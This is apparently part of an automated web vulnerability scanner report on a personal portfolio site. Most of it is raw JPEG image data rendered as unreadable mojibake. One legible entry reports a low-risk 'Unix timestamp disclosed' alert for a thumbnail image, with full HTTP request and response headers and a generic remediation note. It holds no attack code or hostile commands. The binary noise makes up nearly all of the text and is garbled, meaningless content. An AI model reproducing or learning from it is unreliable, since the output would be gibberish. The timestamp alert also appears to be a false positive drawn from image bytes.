¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯UüÁ¿—þÍù_€Ÿ}lyð»g¾ðíÌ»ÍOKŒß´q·Û®E!R©BPdX¦â)uA§Å%r>^ò´ëcz’I±HÙZb'‹§Ë͓ψîâ’æÝ&”'ø~Þµ&ÞOrl]˛ÙûÃ_·w>ÜÈÔbóx\œž·]LÅe†d7VR,ÈêZ9cetfFåM­Õ½í´7v“,–Ò(eaAÿVGpsÑI[I$¤úŸõ¿â=¹éÕ½:‡'×ý‡üWÝÕú‚ÿñ_zn®8ž¡Iùÿ_þ+¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          ٕµ)*Êڕ”ÊÀÜG ƒî§«>¶ÃþQ?Î!7W÷kâ¿Ë]Ò©º‡Ùàz‹¹sõJ‘îp)±»°²•777-3['u‚¥¾óDµp§<r7‚eÞ6HG&H”|>®ƒø|ÙGÃÄváQÏoAâ ûGùzÙ·ïh¿ån—ÿ:"ÿ£ýľŸï¶ý‡¤5½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^¸>OL….ÕÀ¤êqþG¯j_Q×âØ¯ùÙãÿó¶›þ¾{ßÓÏþøØÍ×µ/ñ½ü[ÿ;<þvÓ×Ï~úyÿßûùºö¥þ!׿‹b¿çgÿÎÚoúùïßO?ûáÿaÿ7^Ô¿Ä:
          û·#Ÿª÷”P×QÍ+ãéôÇTHÖÈÑ1҈協ÇãÙß-Ã2ï{{4LYâðž‘ߐlç¡øGU…îgè)×½û¯uï~ëÝ{ߺ÷_ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è¦üœø½‚ïL;eñ"—Ù8ªR˜ŒÓ/Ž›1Aš<&|ƌòR±$AQf’•Àd,Œ²o’írxrU¬˜å}?¤¿?Qçöç§¢”ÆsðõDÛ£mgv~w)¶·6.¯
          ÃÔ½&G[ŽzyBRXeƒÇ"ŽXÙ]•2|3EqsBá¢aPGú¿âº1R)%äúÿ°ÿŠûÙàzs¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¡?üWÝŸWOP¤üÿ®â}ÔõqçÔ)8¹oøu<GW^^ïò÷þb_~p}
          ßÙÂrÁŠëÞÉËÔßïÉÓ
          ÕÞÓµþü›GC‘¿ÓçË¢IC»ŽÝJÜ[®<Àÿÿ(è+»ìÔwf˜âÊ?¿å˜êò½‘ôëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺+_%þ2mÎúÀšºoµÂv&•Ó¸Ìeb«uH¸Lÿ‰ZœTÎOŽ@ZI¼a”ɇ›6õ6×.“V´cܾŸÒ_CüŸ‘E1Œú¯T)¼vŽã؛)µ7f*§žÃÎi«è*”FýQˈZšZ˜˜IѳG,l©ܝðÝB“Àá¢aPGú°}G—FŠÁ€e8éÿñ_n7N'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃêýúþëÕ¼ú‡'çý÷çÝNP¤üÿ­ÿÿPä÷SçÕ¼ú‡'çý÷çÛgˆêþcìêŸSþ·üGºúuqǨOõÿ}ý}Ѿ®<ú„ÿñ_t>}\q=B“óþ¹ÿ‰÷SÕǟP¤üÿ¾þžêxŽ®¼:†ÿñÛôêãêô¿—§ó	ü¡~@çB X1=yÙyz›¶˜hv¦ñ®¨ki¶˜èr27˜g?¦Od[†ßÆ{uûGùGùGA]çe®»Ë4ù²ð¯ùGæ:¾d]º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî‹?ɍ[_¿¶í¤ðawÞ"šUÛ;¤DI^^Q‡ÌˆÁ’³	S3k4”ÎÆH¾²G)ÆÑ¼MµËе³åÿ(ô?áà|ˆzŒGú'T¾ö6èëÏ“ÙûÇQ‡Îâf1TÒÎ.’ÆMଣoe\~¸fŒ”‘
          Á÷'As
          Ü	qná¢aÇü‡Ð1Ñ´l®5)Áé'çýø¯·ON¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõy?ËÇù8N…ùžÿqŸä؎ºì¬´üã¹Zz©¼k¦oø·~˜è²2Ÿò~"¼Z$ˆŠþº¦sæ?Ê?ÍÐWyÙ5¼³Nî,£Ïæ>~£öu~ÿ^G ý²>ýwïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          98849039
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        48. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          99221731, which evaluates to: 1973-02-22 10:35:31

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
